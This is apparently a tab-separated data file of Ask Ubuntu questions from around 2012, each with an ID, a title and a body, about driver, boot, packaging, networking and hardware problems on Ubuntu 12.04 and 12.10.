226489	broken `launcher` after experimenting with `myunity` themes	i used myunity to try some themes such as clearlooks and industrial and then i switched back to default . now my launcher is broken . how can i repair this ? there are many invisible items in the launcher , such as shown here above the google chrome icon . edit : unity -- reset results in thousands of error messages and warnings and the complete loss of the launcher and top-of-screen task-strip . the execution of this command might take 15 minutes or more . unity -- reset-icons also executes for at least 15 minutes , spews errors , and does not resolve the problem .
226495	how to solve dpkg-source source problem when building a package ?	has anyone here had some experience creating a debian / ubuntu package ? i am trying to backport the lammps package ( http : //packages.ubuntu.com/quantal/lammps ) from ubuntu 12.10 ( quantal ) to ubuntu 12.04 i only need it unofficially - just need a .deb package for convenience 's sake when creating custom virtual machine images for deployment to iaas platform . following the ubuntu packaging guide at https : //wiki.ubuntu.com/packagingguide , i can build successfully , except when i try to rebuild using the debuild command , i usually get this error : dpkg-source : error : aborting due to unexpected upstream changes , see /tmp/lammps_0~20120615.gite442279-1.diff.aie32n dpkg-source : info : you can integrate the local changes with dpkg-source -- commit dpkg-buildpackage : error : dpkg-source -- include-binaries -i -b lammps-0~20120615.gite442279 gave error exit status 2 running 'make clean-all ' at the src directory still does not solve the problem . is there any way to completely clean off all the files that were generated during the build process , or to ask debuild to ignore any differences in the source files ?
226500	ubuntu 12.10 , 12.04 `` unable to find medium containing a live file system ''	when installing ubuntu via xen i get unable to find medium containing a live file system i go the iso from http : //www.ubuntu.com/download/desktop and have been following this tuorial https : //help.ubuntu.com/community/xenproposed : manually installing an hvm guest vm this is my xen cfg file builder='hvm' kernel='/usr/lib/xen-4.1/boot/hvmloader' name = `` ubuntu '' memory = `` 2048 '' maxmem = `` 13312 '' vcpus = 4 disk = [ 'phy : /dev/server/ubuntu-hvm , hda , w ' , 'file : /data/ubuntu-12.10-desktop- amd64.iso , hdc : cdrom , r ' ] vfb = [ `` type=vnc , vncunused=1 , keymap=en-us , vnclisten=0.0.0.0 '' ] vif = [ 'bridge=eth0 ' ] boot= '' dc '' device_model='/usr/lib/xen-4.1/qemu-dm' i tested 12.04 , 11.10 ange get the same error thanks for your help
226504	will i keep my programs , like powerpoint , word , excel , itunes , etc ?	i am seriously considering installing ubuntu , it looks cool , the tour felt nice and it 's a really smooth program . but what if i decide later on in life that i would like to go to windows again , could i ? will i be able to run programs like powerpoint , word , excel and itunes ?
226507	black screen on boot after installing ati drivers	system : xubuntu 12.10 x86 i installed the ati drivers using the software center , everything apparently whent fine ( no error messages ) . after rebooting the system i get a black screen . the system responds to input ( if i press the power down button it closes gracefully ) but is completely unusable . from the boot menu i can decide to load the root terminal , but i have no idea of what to do in order to remove the drivers . following some guides i looked for : the xorg.conf file in /etc/x11 /usr/share/fglrx/fglrx-uninstall.sh /usr/share/ati/fglrx-uninstall.sh but they were all missing . what steps can i take ?
226518	what is a cross-platform alternative to ibooks author ?	this is pretty important . my school is currently in a stage of digitalisation that wants to get rid of textbooks and replace them with tablets in class . they are , however , contemplating on using ibooks author to allow teachers to create content for students . and as we know , files created with ibooks author can only be used on apple products . therefore , all students will be required to purchase an ipad for use in class , for any alternatives simply become impossible . for many reasons , i disagree with this approach , and would like to see a byod ( bring your own device ) policy . this is possible if a workable solution to the problem is found . namely , the school needs a system that allows the following : easy ( ! ) creation of digital textbooks by teachers . a lot of teachers are n't digital masterminds , and require a simple interface to create textbooks . ease of use for students . students should n't be distracted by complicated interfaces . the textbooks must be able to play multimedia . the textbook should be able to contain text , images , audio and video . content allows for use on tablets ( ios and android primarily ) . preferably , it should allow for use on any device . the following are much preferred ( the ibooks approach does n't meet some of these ) : easy sharing . the teacher must be able to easily share the textbook with students and push updates effortlessly . files are technically a no-no , but acceptable . the school already has a system for pushing files to students . free of charge . the school ca n't afford licenses for every student or for every teacher . html5 . anything html5 is good . does anything come to mind ? you can think outside the box , really , see if anything meets the requirements .
226520	how to modify size of swap with a lvm partition ?	i 'm trying to add/modify a swap partition on my lvm-formatted hard disk by using gparted from a livecd . i only see one big partition taking up the whole disk . is there a hidden swap ? does an lvm-formatted system even need a swap ? i 'm using ubuntu 12.10 .
226522	brother mfc-7420 scanner on ubuntu 12.04 : invalid argument	i have a brother mfc-7420 , which also works as a scanner . i have attached this machine to a computer running ubuntu 12.04 lts 64bit via usb . i installed the following package : brscan2-0.2.4-0.i386.deb now when i start xsane , the device is detected . however , when i try to scan or run a preview scan , i get the message could not start scanner : invalid argument . the same problem exists if i run xsane as root , so i do n't think it 's a privilege problem . there 's no output on the console while running xsane ( see screenshot below ) . the dialog box showing the error appeared just after pressing the `` scan '' button in xsane . what can i do to get this scanner running ?
226526	ubuntu 12.10 opencl opengl interop with ati graphics	i have successfully installed the ati catalyst drivers on a my ati hybrid graphics system running on ubuntu 12.10 . i have verified that opencl and opengl work independently ; however opencl-opengl interop is not functioning correctly . i 've done some debugging , but am not sure where to go from here . can anyone help ? details : my system is an hp envy 6 running ubuntu 12.10 ( all updates applied ) with a ati hybrid graphics system composed of an radeon 7600m and intel hd3000 . i installed the latest ati beta drivers ( v. 12.11 ) following these instructions : ubuntu 12.10 amd/intel hybrid graphics not working doing this i was able to get opengl and opencl operational . glxgears runs at ~1200 fps and all of the opencl-only samples in the amd app sdk function as expected . however , any opencl-opengl interop applications fail to launch with a x error of failed request : badmatch ( invalid parameter attributes ) error . all of the sample code previously worked under ubuntu 12.04 with the package manager ati drivers . to get a little more debugging information , i ran libgl_debug=verbose /opt/amdapp/samples/opencl/bin/x86_64/simplegl . this detects my discrete gpu , appears to select the right drivers , and detects that opencl-opengl interop is enabled : $ libgl_debug=verbose ./simplegl ukidynamicmajor : found major device number 250 ukidynamicmajor : found major device number 250 ukidynamicmajor : found major device number 250 ukiopendevice : node name is /dev/ati/card0 ukiopendevice : open result is 7 , ( ok ) ukigetbusid returned 'pci:1:0:0' ukiopendevice : node name is /dev/ati/card1 ukiopendevice : uki_err_not_root ... ukiopendevice : node name is /dev/ati/card15 ukiopendevice : uki_err_not_root ukidynamicmajor : found major device number 250 ukiopenbybusid : searching for busid pci:1:0:0 ukiopendevice : node name is /dev/ati/card0 ukiopendevice : open result is 7 , ( ok ) ukiopenbybusid : ukiopenminor returns 7 ukiopenbybusid : ukigetbusid reports pci:1:0:0 ukidynamicmajor : found major device number 250 ukidynamicmajor : found major device number 250 ukiopenbybusid : searching for busid pci:1:0:0 ukiopendevice : node name is /dev/ati/card0 ukiopendevice : open result is 7 , ( ok ) ukiopenbybusid : ukiopenminor returns 7 ukiopenbybusid : ukigetbusid reports pci:1:0:0 platform 0 : advanced micro devices , inc . platform found : advanced micro devices , inc . selected platform vendor : advanced micro devices , inc. device 0 : turks device id is 0x1a16b40 number of displays 1 libgl : atigetclientdrivername : 9.1.11 fglrx ( screen 0 ) libgl : opendriver : trying /usr/lib/fglrx/dri/fglrx_dri.so ukidynamicmajor : found major device number 250 ukidynamicmajor : found major device number 250 ukiopenbybusid : searching for busid pci:1:0:0 ukiopendevice : node name is /dev/ati/card0 ukiopendevice : open result is 10 , ( ok ) ukiopenbybusid : ukiopenminor returns 10 ukiopenbybusid : ukigetbusid reports pci:1:0:0 glxcreatecontextattribsarb 0x7f4e05938280 number of interoperable devices 1 interop device id is 0x1a16b40 libgl : opendriver : trying /usr/lib/fglrx/dri/tls/i965_dri.so libgl : opendriver : trying /usr/lib/fglrx/dri/i965_dri.so libgl error : dlopen /usr/lib/fglrx/dri/i965_dri.so failed ( /usr/lib/fglrx/dri/i965_dri.so : can not open shared object file : no such file or directory ) libgl : opendriver : trying /usr/lib32/fglrx/dri/tls/i965_dri.so libgl : opendriver : trying /usr/lib32/fglrx/dri/i965_dri.so libgl error : dlopen /usr/lib32/fglrx/dri/i965_dri.so failed ( /usr/lib32/fglrx/dri/i965_dri.so : can not open shared object file : no such file or directory ) libgl error : unable to load driver : i965_dri.so libgl error : driver pointer missing libgl error : failed to load driver : i965 libgl : opendriver : trying /usr/lib/fglrx/dri/tls/swrast_dri.so libgl : opendriver : trying /usr/lib/fglrx/dri/swrast_dri.so libgl error : dlopen /usr/lib/fglrx/dri/swrast_dri.so failed ( /usr/lib/fglrx/dri/swrast_dri.so : can not open shared object file : no such file or directory ) libgl : opendriver : trying /usr/lib32/fglrx/dri/tls/swrast_dri.so libgl : opendriver : trying /usr/lib32/fglrx/dri/swrast_dri.so libgl error : dlopen /usr/lib32/fglrx/dri/swrast_dri.so failed ( /usr/lib32/fglrx/dri/swrast_dri.so : can not open shared object file : no such file or directory ) libgl error : unable to load driver : swrast_dri.so libgl error : failed to load driver : swrast x error of failed request : badmatch ( invalid parameter attributes ) major opcode of failed request : 155 ( glx ) minor opcode of failed request : 5 ( x_glxmakecurrent ) serial number of failed request : 28 current serial number in output stream : 28 i 'm not sure where to go from here . this could either be a lingering issue with the known ati ubuntu 12.10 problems or something new . anyone have any suggestions ?
226529	ubuntu 12.04 freezes when booting	translated i installed ubuntu 12.04 lts from the livecd , after finalizing the installation process and booting correctly , i applied the pending updates , which asked me to reboot . after rebooting , an error appeared saying `` out of range '' . i pressed ctrl+alt+f1 , login to the tty1 terminal and edit the xorg.conf file and add vertrefresh 50.0 - 60.0 to it , which would solve the `` out of range '' problem that was mentioned before . after applying the changed and rebooting again , the following boot screen is all i see now : it freezes there . i even waited 2 hours and nothing happened . can anybody help ? thank you ! original instale ubuntu 12.04 lts desde el live cd , al finalizar la instalación inicio el sistema operativo e inicia correctamente , después de aplicar actualizaciones me solicita reiniciar en lo cual acepto . al volver a iniciar me daba un erro de `` fuera de rango '' , aprieto ctrl + alt + f1 , me logueo y edito el archivo xorg.conf en la sección screen y agrego `` vertrefresh 50.0 - 60.0 '' , lo cual solucionaría el problema de `` fuera de rango '' , al aplicar los cambios , vuelvo a iniciar y solamente me aparece la pantalla de inicio ( véase imagen : http : //t.bb/fh ) y queda colgado , lo deje por lo menos 2 horas así y nada sucedió . ¿alguien puede ayudarme ? gracias !
226532	clean uninstall of kernel	during installation of ubuntu kernel 3.5.0.20-33 sthg . wrong happened , i guess during initramfs . how can i cleanly uninstall the kernel ? apt-get remove -- purge linux-image-3.5.0.20 and re-installing does not solve the problem . i would like to achieve the state that all triggers of a first time install are fired and eg . muon notifies me of the new kernel which it does n't do now .
226533	nvidia : no error but black screen	so i went through a lot of questions and documentations ( including of course nvidia 's ) and whatnot , hoping to find the solution to this problem but i could n't . the thing is , i want my ubuntu 12.04 precise ( on a dell xps 15 ) to run its xorg with the driver 304.54 that is shipped with cuda 5 ( obviously because i want to use cuda 5 , but would love to have the neat graphics when i do n't ) . the driver is installed properly ( afaik ) any other driver has been removed with -- purge . i have installed it with the `` devdriver_5.0_linux_64_304.54.run '' that comes inside `` cuda_5.0.35_linux_64_ubuntu11.10-1.run '' i have uninstalled and reinstalled everything several times as indicated in several tutorials / answers to nvidia questions . a few commands outputs : $ lsmod | grep nv nvidia 11270980 0 $ lspci | grep -i nvidia 01:00.0 vga compatible controller : nvidia corporation gf108 [ geforce gt 540m ] ( rev a1 ) $ nvidia-smi -l gpu 0 : geforce gt 540m ( uuid : gpu-0016ec97-5f26-f9cd-e618-c7109d7bf0d2 ) $ dkms status nvidia , 304.54 , 3.2.0-34-generic , x86_64 : installed vboxhost , 4.1.22 , 3.2.0-29-generic , x86_64 : installed vboxhost , 4.1.22 , 3.2.0-34-generic , x86_64 : installed vboxhost , 4.1.22 , 3.2.0-34-virtual , x86_64 : installed dmesg | grep -i nvidia [ 18.366259 ] nvidia : module license 'nvidia ' taints kernel . [ 20.558104 ] nvidia 0000:01:00.0 : power state changed by acpi to d0 [ 20.558463 ] nvidia 0000:01:00.0 : power state changed by acpi to d0 [ 20.558585 ] nvidia 0000:01:00.0 : enabling device ( 0006 - > 0007 ) [ 20.558746 ] nvidia 0000:01:00.0 : pci int a - > gsi 16 ( level , low ) - > irq 16 [ 20.559427 ] nvidia 0000:01:00.0 : setting latency timer to 64 [ 20.574937 ] nvrm : loading nvidia unix x86_64 kernel module 304.54 sat sep 29 00:05:49 pdt 2012 $ xorg -version x.org x server 1.11.3 release date : 2011-12-16 x protocol version 11 , revision 0 build operating system : linux 2.6.42-23-generic x86_64 ubuntu current operating system : linux fordprefect 3.2.0-34-generic # 53-ubuntu smp thu nov 15 10:48:16 utc 2012 x86_64 kernel command line : boot_image=/boot/vmlinuz-3.2.0-34-generic root=uuid=a35b41e6-f102-422b-9c57-c6ce26ac9ea0 ro quiet splash build date : 29 august 2012 12:12:33am xorg-server 2:1.11.4-0ubuntu10.8 ( for technical support please see http : //www.ubuntu.com/support ) current version of pixman : 0.24.4 crt-0 is the only display device found as connected ( see from xorg.0.log ) : [ 320.555 ] ( -- ) nvidia ( 0 ) : valid display device ( s ) on geforce gt 540m at pci:1:0:0 [ 320.555 ] ( -- ) nvidia ( 0 ) : crt-0 ( connected ) [ 320.555 ] ( -- ) nvidia ( 0 ) : dfp-0 changing xorg.conf and observing xorg.0.log : if i do not use the nvidia driver ( using driver `` fbdev '' ) , the system runs some intel graphics chip . there are then no devices named /dev/nv* if i add the nvidia driver to xorg.conf , the xorg fails saying it ca n't find the card on its own , and starts lightdm in low resolution if i add busid , the xorg.log complains that it ca n't read the edid and says in starts with 640x480 . /dev/nvidia0 and /dev/nvidiactl are created . if i add the edid with option `` customedid '' `` crt-0 : /path/to/edid.bin '' ( which i got from get-edid ( in package read-edid ) when running without nvidia driver ) there is no error or warning , in the xorg log . /dev/nvidia0 and /dev/nvidiactl are created . i have tried just for the sake of it to set the option `` usedisplaydevice '' to dfp or dfp-0 ( with and without `` connectedmonitor '' ) . but this does not help as expected - my screen is definitely crt-0 as its name ( au optronics something ) appears in the log when i set connectedmonitor . the problem in the three last cases i hear the sound of lightdm starting when it prompts for a password . there is just nothing on screen . i have tried to press the switch-screen button ( fn+f1 here ) but that does not seem to do anything . so i can of ran out of things to try/look at here . if anybody can suggest something i have n't tried ( and preferably not `` try another driver version '' ) , i would be most grateful . here are the device blocks from xorg.conf , with nvidia : section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gt 540m '' busid `` pci:1:0:0 '' option `` customedid '' `` crt-0 : /var/opt/edid.bin '' screen 0 endsection without nvidia : section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 subsection `` display '' depth 24 endsubsection endsection everything in the rest of the xorg.conf was already there before i started looking at it , and is exactly identical in the two different configurations . full xorg.conf file here : http : //pastebay.net/1161671 just to add a little and probably irrelevant detail : in the cases where xorg thinks its working fine on the gpu , and i switch to a tty1-6 and back to tty7 , the screen does n't exactly go black , rather what is on-screen freezes and nothing happens . the screen gets back to life when i go to another tty again .
226534	which ubuntu distribution should i install on this laptop ?	my laptop has 1gb of ram and an intel pentium processor . which distribution would be best for it ? specs are here .
226537	is there exec shield buffer overflow protection for ubuntu ?	is there exec shield buffer overflow protection for ubuntu ? i tried to enable exec shield on ubuntu 12.04 with the following command sudo sysctl -w kernel.exec-shield=1 but it said error : `` kernel.exec-shield '' is an unknown key if not , what is the equivalent solution for ubuntu and how can i install and enable it ?
226539	set time limits for specific applications ( such as games )	i 'd like to set time limits for some specific applications ( such as games ) on ubuntu . there are various windows applications that can do this , including homeguard program blocker , which can limit the usage of certain applications to specific times of day , or restrict application use to certain periods of time . is there any similar software for ubuntu ?
226542	how can i run ubuntu if it 's not on my main drive ?	i have a 120gb ssd and a 750gb hdd in my computer . my ssd has windows 7 installed and my hdd has windows 8 installed . when i boot my computer normally , i boot it to my ssd . i went through the installation process , putting ubuntu on a separate partition on my hdd . when i restarted my computer , it did n't give me an option to boot to ubuntu . if it helps , i believe i used ext4 and only set it to '/ ' . if i want to make ubuntu bootable from my computer , how would i go about doing that ?
226546	how do i get my western digital external drive to work on ubuntu 12.10 ?	i used this 1 tb external device for long time on windows , and i put a password for my device also , how can i get it to work on ubuntu ? my device is listed when i type in lsusb but in windows there was this `` unlocker.exe '' so i could type my password and then access my external hdd , now i have no idea how to access my hdd on ubuntu . please help , thanks .
226560	if a company is using ubuntu on its servers/dektops , does it have to pay ?	a friend of my friend has started a small firm and given me the responsibility to erect all the it infrastructure required ? i 'm basically a windows guy that too on the developer side . but recently i fell in love with linux n dared to dream about becoming a linux admin and play with linux , virtualization , cloud etc . so , first i 'll be running a pilot project of creating mail/ftp/web servers required on a linux based server . and ubuntu is the ideal choice for a linux beginner right ? my question is simple : if a commercial organization is using ubuntu for it 's day to day desktop and server ( mail , ftp etc ) uses but has technicians which can provide support internally then do the organization needs to pay for ubuntu ? if yes then could you please suggest a debian based distro on the lines of centos . also can i use the ubuntu 12.04 lts 64 bit desktop version instead of the no gui server version for the server machine ( gui can be helpful for a windows guy like me ) thanks .
226561	should i install selinux to make my ubuntu web server more secure ?	this wiki page on using selinux with ubuntu informs of the following : the ubuntu-specific `` selinux '' and `` selinux-policy-ubuntu '' packages documented here have not received much attention since karmic , and appear to be effectively broken in precise . so does it make sense to even consider installing selinux with the purpose of making a general-purpose web server running on ubuntu 12.04 more secure ? what are the potential problems that selinux can bring into an ubuntu web server ?
226564	how to install screem in ubuntu 12.10	i downloaded screem ( web development environment ) and tried to compile it , but after running the ./configure command i get this error . checking for screem ... configure : error : package requirements ( gtk+-2.0 > = 2.6.0 glib-2.0 > = 2.6.0 libgnome-2.0 > = 2.2.0 libgnomeui-2.0 > = 2.6.0 libxml-2.0 > = 2.4.3 libglade-2.0 > = 2.3.0 gconf-2.0 > = 2.2.0gnome-vfs-2.0 > = 2.8.3 gdk-pixbuf-2.0 > = 2.2.0 gthread-2.0 > = 2.2.0 libgtkhtml-2.0 > = 2.2.0 gmodule-2.0 > = 2.2.0 libgnomeprint-2.2 > = 2.2.0 libgnomeprintui-2.2 > = 2.2.0 gtksourceview-1.0 > = 1.1.90 libstartup-notification-1.0 libgnome-menu > = 2.9.2 ) were not met : no package 'libgtkhtml-2.0 ' found no package 'libgnomeprint-2.2 ' found no package 'libgnomeprintui-2.2 ' found no package 'gtksourceview-1.0 ' found no package 'libgnome-menu ' found consider adjusting the pkg_config_path environment variable if you installed software in a non-standard prefix . alternatively , you may set the environment variables screem_cflags and screem_libs to avoid the need to call pkg-config . see the pkg-config man page for more details . i also tried to find the missing packages via sudo apt-get cache search but no luck whit the exception of libgnome-menu how do i install screem in ubuntu 12.10 ( amd64 )
226569	ca n't boot in 12.04 after formatting the entire drive	i installed ubuntu 12.04 by formatting the drive that had windows 7 . the installation went fine but after i rebooted it asks me for a windows 7 disk repair disk and does n't even look to recognize any other system . i entered the try ubuntu mode and the drive is there . the amount of space in the drive is 120gb and the drive has 119,24 in ubuntu . i ca n't find the drive that windows 7 use to boot anywhere . i runned boot repair but that does not seem to be the case it still does the same problem . i have a desktop . i installed ubuntu but the boot seems messed up . i still sees windows 7 as a boot option and ubuntu does n't boot . how can i reset the whole boot system in some way ?
226570	android media sync lg optimus l7 ( p705 ) with ubuntu 12.04 lts	i ca n't connect my android lg optimus l7 ( p705 ) with ubuntu via media sync ( mtp ) , just to see or transfer file / media inside my internal / external memory from computer to handphone vice versa , previously i used windows xp and windows 7 , media sync no problem with both os . please help regarding this issue . thanks . my phone is detected using lsusb command : bus 005 device 027 : id 1004:631c lg electronics , inc. but unfortunately , my phone still not detected when i open home folder . i am still looking for solution regarding this mtp issue on my lg optimus l7 since my music player ( philips go gear ) works on mtp also and did not detected by ubuntu but detected even on windows xp .
226571	graphics unusable with fglrx	i 'm having graphics problems with a 1 day old install of 12.10 on a sony vaio vgn-fw139e with a ati mobility radeon hd 3400 . i could not get my hdmi display to be recognized , so i tried installing the proprietary drivers through the software center . when i rebooted however , the resolution had been send to 1024x768 , the launcher can not be seen or accessed , and terminals will not appear . i can get to the system settings menu by right clicking the desktop , but can not launch any other applications . what can i do to resolve this ?
226572	wifi internet problem	the situation i am in is a bit tricky . i am able to connect to my wifi router from my laptop but am not able to access internet . i had been using internet from the same modem and have no idea what suddenly went wrong . three of my friends are still accessing internet from the same modem and have no problems . i even tried to access internet from windows but again the same problem , am getting connected to the wifi network but cant access internet . i have tried to ping my friends connected to the wifi network and also accessed the modem using wifi during which there were no problems . then i tried accessing internet by connecting to the modem/router using lan cable instead , doing which i could access internet . please do help me out with the wifi internet problem
226573	problem with mergelist when trying to check for updates	translated am new in ubuntu , but for a couple of days , every time i try to check for updates i get the following warning : e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_quantal-security_main_i18n_translation-es , e : could not be analyzed , open the package lists or status file . so i ca n't install/uninstall packages . what should i do ? original soy nuevo en ubuntu , pero desde hace dos días cuando estaba comprobando actualizaciones me aparece el siguiente aviso : e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_quantal-security_main_i18n_translation-es , e : no se pudieron analizar o abrir las listas de paquetes o el archivo de estado . y no puedo instalar o desinstalar software . que debo hacer ?
226575	ubuntu with spyware ?	richard stallman states that ubuntu `` has installed surveillance code '' . see : ubuntu spyware -what to do ? is this true ? i agree with him that `` any excuse canonical offers is inadequate ... . '' .
226577	`` /etc/init.d/networking restart '' with non-root user	i have a thin client with 112mb ram which boots ubuntu server 12.04.1 from a usb drive with openbox and it is to be used by students to communicate with cisco equipment . and because of this the students need to be able to reconfigure the network interface and then restart it without a reboot using the only user - cisco . this is what i have so far : adduser cisco usermod -a -g dialout cisco chown root : cisco /etc/network/interfaces chmod 664 /etc/network/interfaces chmod u+s /sbin/shutdown chmod u+s /sbin/reboot chmod u+s /sbin/poweroff chmod u+s /run/network/if* chmod u+s /sbin/ifdown chmod u+s /sbin/ifup and when i run /etc/init.d/networking restart as cisco i get : *reconfiguring network interfaces ... rm : can not remove `eth0.dhclient ' : permission denied failed to send flush request : operation not permitted rtnetlink answers : operation not permitted any ideas on how to get this working ? thanks !
226578	why is there `` seccomp '' events related to google chrome in syslog ?	was in my syslog today and noticed that the google chrome web browser is create tons of events that look like this : dec 7 13:11:02 mycomp-sys76 kernel : [ 8371.604406 ] type=1701 audit ( 1354903862.279:314 ) : auid=4294967295 uid=1000 gid=1000 ses=4294967295 pid=8859 comm= '' chrome '' reason= '' seccomp '' sig=0 syscall=4 compat=0 ip=0x7f8ebb41b205 code=0x50000 dec 7 13:11:02 mycomp-sys76 kernel : [ 8371.604408 ] type=1701 audit ( 1354903862.279:315 ) : auid=4294967295 uid=1000 gid=1000 ses=4294967295 pid=8859 comm= '' chrome '' reason= '' seccomp '' sig=0 syscall=4 compat=0 ip=0x7f8ebb41b205 code=0x50000 dec 7 13:11:02 mycomp-sys76 kernel : [ 8371.604411 ] type=1701 audit ( 1354903862.279:316 ) : auid=4294967295 uid=1000 gid=1000 ses=4294967295 pid=8859 comm= '' chrome '' reason= '' seccomp '' sig=0 syscall=4 compat=0 ip=0x7f8ebb41b205 code=0x50000 dec 7 13:11:02 mycomp-sys76 kernel : [ 8371.604413 ] type=1701 audit ( 1354903862.279:317 ) : auid=4294967295 uid=1000 gid=1000 ses=4294967295 pid=8859 comm= '' chrome '' reason= '' seccomp '' sig=0 syscall=4 compat=0 ip=0x7f8ebb41b205 code=0x50000 dec 7 13:11:02 mycomp-sys76 kernel : [ 8371.810789 ] type=1701 audit ( 1354903862.487:318 ) : auid=4294967295 uid=1000 gid=1000 ses=4294967295 pid=8868 comm= '' chrome '' reason= '' seccomp '' sig=0 syscall=4 compat=0 ip=0x7f8ebb41b205 code=0x50000 anybody know what these are and if they are a problem and how to make them go away ( without just disabling kernel logging ? )
226579	best triple head display setup	i 'm currently running ubuntu 12.04 with a darn good triple head display setup . i 've got a visiontek 900530 radeon hd 5450 512mb ddr3 pci express video card that has two dvi outputs and one mini displayport that i have connected to a hdmi adapter . i 'm running three identical asus 1920x1080 monitors that each have a dvi , vga , and hdmi input . i 'm using the xorg-edgers ppa , so i 'm using the open source radeon driver version 6.99.99 . i tried using the ati binary fglrx driver , but i was n't able to get the three monitors working properly- the monitor connected via hdmi / displayport would n't run at full resolution . the setup is almost perfect : compiz runs fine and is quite snappy . i 'm not able to use that great compiz feature where you can drag a window to the side of a display and it will half maximize . i occasionally experience display corruption weirdness with unity and need to restart it . when i use a dropdown menu in libreoffice it often pops the menu down in another window . for example , if i 'm using the center monitor and click the insert menu , the menu pulls down on the monitor to my right , forcing me to chase it . if i chase down the menu and choose manual break , the dialog appears over on my left monitor . this absurdity is mildly entertaining but has lost its novelty . i 've decided to build a new system and have spared no expense- latest i7 processor , ssd , etc . i really like the performance of the nvidia binary drivers , so i put two zotac zt-40707-10l geforce gt 440 in the system , figuring i 'd have four dvi outputs and an awesome triple ( or even eventually quad ) head setup . unfortunately it appears that i did n't do sufficient research before my purchase . it seems that nvidia twinview only supports two monitors on one card ( i guess that 's why they call it twinview ... ) . i messed around with running two x servers , but i really do n't want that- being able to drag windows to any monitor is critical . it does n't sound like xinerama is an option because from what i understand it simply does n't support compiz . i 've seen a basemosaic option that can be used with the nvidia drivers that appears to support an almost unlimited number of heads- unfortunately my cheap little cards do n't support it . i 'm also not sure whether you 'll still have all nice maximizing and snapping that twinview provides , or whether ubuntu will only see it as one massive display . i put my old trusty ati card into my new system and installed 12.10 . i 'm using the opensource radeon drivers again because even in 12.10 i ca n't get the fglrx binary drivers to do triple head . unfortunately , even with an unbelievably powerful system the experience is extremely sluggish ( much more so than my experience in 12.04 ) . the menu scattering problem appears to be fixed , but i get a lot of nasty unity display corruption . so finally , my question is this : what hardware / drivers should i use ? i 'm willing to buy ( almost ) any video card ( s ) . i have two pci-express 3.0 slots on my motherboard ( which has an integrated intel hd card ) . i 'm willing to use ati or nvidia cards and willing to run ubuntu 12.04.1 or 12.10 . i 'm not a gamer , but do want beautiful and snappy compiz effects . does anyone out there have the perfect triple head setup in 12.04 or 12.10 ? what hardware / drivers are you using ? i have those two nvidia cards but will probably be returning them unless someone knows a way to use them together for a triple head setup . since i 'm having pretty good luck with a single ati card providing three displays , should i just buy a beefier one with the hopes that it will fix the horrible sluggishness i 'm experiencing in 12.10 ?
226580	polly ( twitter client ) problem authorization	ubuntu 12.04 lts . polly 0.93.5 . internet connection ( l2tp ) is established . no proxy . i ca n't add the twitter account . in the window `` add new account '' written : twitter did not authorize the request . please try again restart request - no result . in `` hotot '' client - show message : 2012-11-7 0:33:0oops , a network error occured network error ! please try later . can not get token from the server . special settings network or what ?
226583	ubuntu one for mac 10.6 or higher says on 10.6.8 `` ubuntu one can not run on this type of mac ''	i downloaded the beta and installed ubuntu one . there is a `` no entry '' sign on the uo logo , try to run but gives the above error message . this is an intel mac book pro with a core duo and mac os v10.6.8
226587	can not reset my password	i can not reset my password i 'm kinda stuck ... i tried resetting my password with the recovery mode but it says error ! does anybody know how to solve my problem ? ? ? i also could upload some screenshots of my problem if that would help ? it all started when i deleted the password after i tried editing my user account settings and it wants my password but i press enter and it says wrong password also when i download something it says that i have to provide password to 'authenticate ' i press enter too but nothing ... i type my old password too but it says 'wrong ! ' my user account and as you can see there is no password i entered my password but you can see i can not change it ... what is going on ? ! ? !
226589	flash bios before lubuntu 12.10 install on asus eee pc 1015bx	i would like to install lubuntu 12.10 on an asus eee pc seashell 1015bx , but have noticed that there are a number of bios updates on the asus support page . does anyone have any experience updating an asus pc bios before installing ubuntu ( lubuntu ) ? the laptop currently has windows 7 starter installed .
226590	problems upgrading to python 3.3 and setting up django	i 'm new to linux and am trying to set up python / django on my machine ! i installed python 3.3 from the source file and it was compiled into /usr/local/bin . then i created a symbolic link between /usr/bin/python and /usr/local/bin/python3 , so that whenever i invoke python from the command line it uses the latest version . now i am trying to install mysql python and i got the following output : apt-get install python-mysqldb reading package lists ... done building dependency tree reading state information ... done python-mysqldb is already the newest version . the following extra packages will be installed : apt-listchanges python-apt suggested packages : python-glade2 python-gtk2 python-apt-dbg python-vte python-apt-doc the following packages will be upgraded : apt-listchanges python-apt 2 upgraded , 0 newly installed , 0 to remove and 142 not upgraded . 3 not fully installed or removed . need to get 0 b/394 kb of archives . after this operation , 250 kb of additional disk space will be used . do you want to continue [ y/n ] ? y traceback ( most recent call last ) : file `` /usr/bin/apt-listchanges '' , line 28 , in < module > import apt_pkg importerror : no module named 'apt_pkg' any ideas on how to fix this ? or any tips on how to clean up this install ( if this one is too broken ) ?
226592	no keyboard input in virtualbox 4.1	i 've just installed virtualbox from the 12.10 repo and i 'm finding that there is no keyboard input ( although the host key works ) on the boot screen of the guest os . the guest os is a recent version of debian . the machine boots and then hangs on the boot menu . my host and guest are both 64bit . are there any issues with keyboard input surrounding virtualbox on ubuntu 12.10 at the moment ?
226595	12.10 sudenly ca n't see my own wifi	so , i have a dlink 655 whose network is suddenly not showing up in ubuntu ? i have just returned from a week of travelling ( during which i used plenty of wifi on ubuntu ) , and on returning home , both win 7 ( same computer ) and phone can see the network just fine , and ubuntu can see 5 other networks , but my own is gone ? i have of coursed tried restarting the router , to no avail . right now i 'm on one of the other networks , which works fine ( but is of course pretty unsatisfactory ) . the network is not hidden . i 'm guessing some driver update in the past week ( like a good boy i of course install all suggested updates ) has messed something up ? any ideas for what to do ?
